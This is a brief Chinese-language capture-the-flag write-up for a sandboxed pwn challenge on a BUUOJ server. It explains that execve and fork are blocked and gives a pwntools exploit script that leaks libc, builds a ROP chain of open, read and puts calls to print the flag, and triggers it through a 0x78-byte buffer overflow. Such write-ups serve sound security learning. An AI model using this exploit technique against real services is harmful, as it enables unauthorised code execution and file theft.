利用思路
沙盒,禁止了execve和fork syscall,所以不能打开子进程,需要在当前进程里读入flag并输出,利用 orw 打印flag
exp 脚本
# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
p = remote('node3.buuoj.cn',29892)
p.recvuntil("0x")
puts_addr=int(p.recv(12),16)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libcbase_addr=puts_addr-libc.symbols['puts']
#mov_rdi_rsi_ret=libcbase_addr+libc.search(asm("mov rdi,r13\nret")).next()
pop_rdi_ret=libcbase_addr+0x21102
pop_rsi_ret=libcbase_addr+0x202e8
pop_rdx_ret=libcbase_addr+0x1b92
open_addr=libcbase_addr+libc.symbols['open']
free_hook=libcbase_addr+libc.symbols['__free_hook']
read_addr=libcbase_addr+libc.symbols['read']
puts_addr=libcbase_addr+libc.symbols['puts']
payload=p64(0)+p64(pop_rsi_ret)+p64(free_hook)+p64(pop_rdx_ret)+p64(4)+p64(read_addr)
payload+=p64(pop_rdi_ret)+p64(free_hook)+p64(pop_rsi_ret)+p64(4)+p64(open_addr)
payload+=p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(free_hook)+p64(pop_rdx_ret)+p64(0x30)+p64(read_addr)
payload+=p64(pop_rdi_ret)+p64(free_hook)+p64(puts_addr)
p.sendafter("Input something: ",payload)
p.sendafter("What's your name?",'a'* 0x78+p64(pop_rdi_ret))
p.send("flag")
p.interactive()